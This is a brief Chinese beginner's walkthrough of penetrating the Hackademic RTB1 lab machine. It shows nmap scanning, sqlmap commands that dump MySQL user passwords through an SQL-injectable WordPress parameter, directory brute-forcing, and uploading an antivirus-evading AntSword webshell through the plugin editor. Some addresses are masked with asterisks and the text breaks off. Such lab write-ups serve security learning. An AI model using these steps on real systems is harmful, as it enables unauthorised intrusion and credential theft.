适合安全爱好者小白初次渗透~粗略简写若有错误多多担待哈~ 一、主机发现 1、利用nmap进行主机扫描 2、Nmap -sP**2.168.30.0/24 3、进一步扫描端口nmap -sV **2.168.30.128-129 4、访问80成功 5、信息收集 直接查看源码发现是wordpress 6、爆破攻击 sqlmap -u"http://192.168.30.128/Hackademic_RTB1/?cat=1" –dbs 使用sqlmap进行测试 sqlmap -u"http://**.168.30.128/Hackademic_RTB1/?cat=1" -D mysql –tables
查看某公司公司表 sqlmap -u"http://**2.168.30.128/Hackademic_RTB1/?cat=1" -D mysql -T user–columns
查看某公司公司密码 sqlmap -u"http://1**.168.30.128/Hackademic_RTB1/?cat=1" -D mysql -T user–columns --user,password --dump 获取密码登录界面 扫描目录发现plugin敏感目录 上dirbuster发现目录
找到plugin编辑器修改插件 用蚁剑生成免杀shell
上传大某公司
|